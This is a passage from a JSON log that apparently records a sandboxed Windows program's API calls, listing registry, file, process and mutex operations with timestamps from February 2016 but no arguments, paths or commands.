"RegQueryValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,303", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,303", "api": "RegOpenKeyExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,303", "api": "RegQueryValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,303", "api": "RegQueryValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,303", "api": "RegQueryValueExA"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,303", "api": "LdrGetDllHandle"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,303", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,303", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,303", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,303", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,303", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,303", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,303", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,303", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,303", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,303", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,303", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,303", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,303", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,303", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,303", "api": 
"LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,303", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,303", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,303", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,303", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,303", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,303", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,303", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,303", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,303", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,303", "api": "LdrGetProcedureAddress"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,303", "api": "RegOpenKeyExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,303", "api": "RegQueryValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,303", "api": "RegQueryValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,303", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,303", "api": "RegOpenKeyExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,303", "api": "RegOpenKeyExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,303", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,303", "api": "RegQueryValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,303", "api": "RegQueryValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,303", "api": "RegQueryValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,303", "api": 
"RegQueryValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,303", "api": "RegQueryValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,303", "api": "RegQueryValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,303", "api": "RegOpenKeyExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,303", "api": "RegOpenKeyExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,303", "api": "RegOpenKeyExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,303", "api": "RegOpenKeyExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,303", "api": "RegQueryValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,303", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,303", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,303", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,303", "api": "RegOpenKeyExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,303", "api": "RegOpenKeyExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,303", "api": "RegOpenKeyExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,303", "api": "RegOpenKeyExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,303", "api": "RegQueryValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,303", "api": "RegQueryValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,303", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,303", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,303", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,303", "api": "RegQueryValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,303", "api": "RegQueryValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,303", "api": 
"RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,303", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,303", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,303", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,303", "api": "RegQueryValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,303", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,303", "api": "RegQueryValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,303", "api": "RegOpenKeyExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,303", "api": "RegQueryValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,303", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,303", "api": "RegOpenKeyExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,303", "api": "RegQueryValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,303", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,303", "api": "RegOpenKeyExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,303", "api": "RegOpenKeyExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,303", "api": "RegQueryValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,303", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,303", "api": "RegOpenKeyExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,303", "api": "RegOpenKeyExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,303", "api": "RegOpenKeyExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,303", "api": "RegOpenKeyExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,303", "api": "RegQueryValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,303", "api": 
"RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,303", "api": "RegOpenKeyExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,303", "api": "RegQueryValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,303", "api": "RegQueryValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,303", "api": "RegQueryValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,303", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,303", "api": "RegOpenKeyExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,303", "api": "RegQueryValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,303", "api": "RegOpenKeyExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,303", "api": "RegQueryValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,303", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,303", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,303", "api": "RegOpenKeyExA"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,303", "api": "LdrLoadDll"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,303", "api": "LdrGetProcedureAddress"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,303", "api": "RegCreateKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,303", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,303", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,303", "api": "RegCreateKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,303", "api": "RegSetValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,303", "api": "RegCloseKey"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,303", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,303", "api": 
"NtSetInformationFile"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,303", "api": "RegQueryValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,303", "api": "RegQueryValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,303", "api": "RegOpenKeyExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,303", "api": "RegOpenKeyExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,303", "api": "RegOpenKeyExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,303", "api": "RegOpenKeyExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,303", "api": "RegOpenKeyExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,303", "api": "RegOpenKeyExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,303", "api": "RegOpenKeyExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,303", "api": "RegSetValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,303", "api": "RegSetValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,303", "api": "RegSetValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,303", "api": "RegSetValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,303", "api": "RegSetValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,303", "api": "RegSetValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,303", "api": "RegSetValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,303", "api": "RegSetValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,303", "api": "RegSetValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,303", "api": "RegSetValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,303", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,303", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,303", "api": 
"RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,303", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,303", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,303", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,303", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,303", "api": "RegOpenKeyExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,303", "api": "RegQueryValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,303", "api": "RegOpenKeyExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,303", "api": "RegQueryValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,303", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,303", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,303", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,303", "api": "RegOpenKeyExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,303", "api": "RegCreateKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,303", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,303", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,303", "api": "RegCreateKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,303", "api": "RegSetValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,303", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,303", "api": "RegQueryValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,303", "api": "RegQueryValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,303", "api": "RegOpenKeyExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,303", "api": 
"RegQueryValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,303", "api": "RegOpenKeyExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,303", "api": "RegQueryValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,303", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,303", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,303", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,303", "api": "RegOpenKeyExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,303", "api": "RegCreateKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,303", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,303", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,303", "api": "RegCreateKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,303", "api": "RegSetValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,303", "api": "RegCloseKey"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,303", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,303", "api": "NtSetInformationFile"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,303", "api": "RegQueryValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,303", "api": "RegQueryValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,303", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,303", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,303", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,303", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,303", "api": "RegCloseKey"}, {"category": "synchronization", "timestamp": "2016-02-16 17:41:35,303", "api": 
"NtOpenMutant"}, {"category": "synchronization", "timestamp": "2016-02-16 17:41:35,303", "api": "NtOpenMutant"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,303", "api": "LdrGetDllHandle"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,303", "api": "LdrGetProcedureAddress"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,303", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,303", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,303", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,303", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,303", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,303", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,303", "api": "NtQueryInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,303", "api": "NtCreateFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:35,303", "api": "NtOpenSection"}, {"category": "process", "timestamp": "2016-02-16 17:41:35,303", "api": "ZwMapViewOfSection"}, {"category": "synchronization", "timestamp": "2016-02-16 17:41:35,313", "api": "NtOpenMutant"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,313", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,313", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,313", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,313", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,313", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,313", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,313", "api": "NtQueryInformationFile"}, {"category": 
"filesystem", "timestamp": "2016-02-16 17:41:35,313", "api": "NtCreateFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:35,313", "api": "NtOpenSection"}, {"category": "process", "timestamp": "2016-02-16 17:41:35,313", "api": "ZwMapViewOfSection"}, {"category": "synchronization", "timestamp": "2016-02-16 17:41:35,313", "api": "NtOpenMutant"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,313", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,313", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,313", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,313", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,313", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,313", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,313", "api": "NtQueryInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,313", "api": "NtCreateFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:35,313", "api": "NtOpenSection"}, {"category": "process", "timestamp": "2016-02-16 17:41:35,313", "api": "ZwMapViewOfSection"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,313", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,313", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,313", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,313", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,313", "api": "NtQueryInformationFile"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,313", "api": "RegOpenKeyExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,313", "api": "RegOpenKeyExA"}, {"category": "registry", "timestamp": "2016-02-16 
17:41:35,313", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,313", "api": "RegEnumKeyExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,313", "api": "RegOpenKeyExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,313", "api": "RegQueryValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,313", "api": "RegQueryValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,313", "api": "RegQueryValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,313", "api": "RegQueryValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,313", "api": "RegQueryValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,313", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,313", "api": "RegEnumKeyExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,313", "api": "RegOpenKeyExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,313", "api": "RegQueryValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,313", "api": "RegQueryValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,313", "api": "RegQueryValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,313", "api": "RegQueryValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,313", "api": "RegQueryValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,313", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,313", "api": "RegEnumKeyExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,313", "api": "RegCloseKey"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,313", "api": "NtQueryInformationFile"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,313", "api": "RegOpenKeyExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,313", "api": "RegOpenKeyExW"}, {"category": "registry", 
"timestamp": "2016-02-16 17:41:35,313", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,313", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,313", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,313", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,313", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,313", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,313", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,313", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,313", "api": "RegOpenKeyExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,313", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,313", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,313", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,313", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,313", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,313", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,313", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,313", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,313", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,313", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,313", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,313", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,313", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 
17:41:35,313", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,313", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,313", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,313", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,313", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,313", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,313", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,313", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,313", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,313", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,313", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,313", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,313", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,313", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,313", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,313", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,313", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,313", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,313", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,313", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,313", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,313", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,313", "api": 
"RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,313", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,313", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,313", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,313", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,313", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,313", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,313", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,313", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,313", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,313", "api": "RegOpenKeyExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,313", "api": "RegOpenKeyExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,313", "api": "RegQueryValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,313", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,313", "api": "RegQueryValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,313", "api": "RegQueryValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,313", "api": "RegQueryValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,313", "api": "RegQueryValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,313", "api": "RegQueryValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,313", "api": "RegQueryValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,313", "api": "RegQueryValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,313", "api": "RegQueryValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,313", "api": 
"RegQueryValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,313", "api": "RegQueryValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,313", "api": "RegQueryValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,313", "api": "RegQueryValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,313", "api": "RegQueryValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,313", "api": "RegOpenKeyExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,313", "api": "RegQueryValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,313", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,313", "api": "RegOpenKeyExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,313", "api": "RegOpenKeyExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,313", "api": "RegOpenKeyExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,313", "api": "RegOpenKeyExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,313", "api": "RegOpenKeyExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,313", "api": "RegQueryValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,313", "api": "RegQueryValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,313", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,313", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,313", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,313", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,313", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": 